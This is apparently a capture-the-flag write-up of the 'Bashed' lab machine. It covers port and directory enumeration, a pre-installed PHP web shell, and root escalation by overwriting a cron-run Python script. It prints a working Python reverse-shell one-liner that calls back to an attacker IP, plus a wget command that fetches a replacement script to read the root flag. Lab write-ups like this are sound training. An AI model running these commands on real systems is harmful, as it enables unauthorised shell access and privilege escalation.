Bashed

OS: Linux, Difficult: Easy, IP: 10.10.10.68

Initial Enumeration

Nmap scan for all TCP ports

sudo nmap -T4 -p- -oN T-all 10.10.10.68
# Nmap 7.70 scan initiated Tue Jul 2 23:33:14 2019 as: nmap -T4 -p- -oN T-all 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.24s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
# Nmap done at Tue Jul 2 23:44:27 2019 -- 1 IP address (1 host up) scanned in 672.99 seconds

Only 1 attack vector i.e. port 80 HTTP server.

sudo nmap -p 80 -sV -sC -oN O-Detailed 10.10.10.68
# Nmap 7.70 scan initiated Tue Jul 2 23:37:00 2019 as: nmap -p 80 -sV -sC -oN O-Detailed 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jul 2 23:37:12 2019 -- 1 IP address (1 host up) scanned in 12.61 seconds

No searchsploit results for the particular version of the Apache HTTPd Server.

Page with 1 single post that suggests that

Ran gobuster on the server to get a few directories to explore

gobuster dir -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-medium -u http://10.10.10.68
/uploads (Status: 301)
/images (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/fonts (Status: 301)

Uploads and Dev seemed interesting. However, uploads was empty.

phpbash.php got us the web-shell already installed on the server with www-data user.

User Own

> cat /home/arrexel/user.txt
2c281***

Root Own

Another thing to notice was user www-data is able to run sudo as scriptmanager without a password and there's an interesting folder owned by scriptmanager in the root directory.

sudo -u scriptmanager ls -la /scripts
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 2017 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 Jul 4 02:44 test.txt [TIME CHANGED]
------------------------------
-rw-r--r-- 1 root root 12 Jul 4 03:03 test.txt [TIME CHANGED]

To run LinEnum.sh I got a reverse shell from the existing web-shell. Using the python server I downloaded the LinEnum.sh file onto the server and ran to see what all was interesting.

sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' &

There was nothing too exciting in the output except the fact that there were some crontabs registered for the user root. As evident from the listings of the folder /scripts/ the text file was being generated every minute as stated above.

The code which was being run was test.py

f = open("test.txt", "w")
f.write("testing 123!")
f.close

As evident from the permissions, this file can be modified by the scriptmanager user and hence can be used to our leverage.

Craft the following python script on the attacker system, transfer, and replace the file on the machine and wait for the output.

import os
cmd = "cat /root/root.txt > /tmp/root"
os.system(cmd)
sudo -u scriptmanager wget http://10.10.14.13:9999/script.py -O /scripts/test.py

After 1 minute we will have our root flag in the /tmp/root file.

> cat /tmp/root
cc4f0***

Learning outcome

Having a closer look at suspiciously owned root files, as these may give out important information, as in this case the change in time every minute was the clue to a root owned cron tab.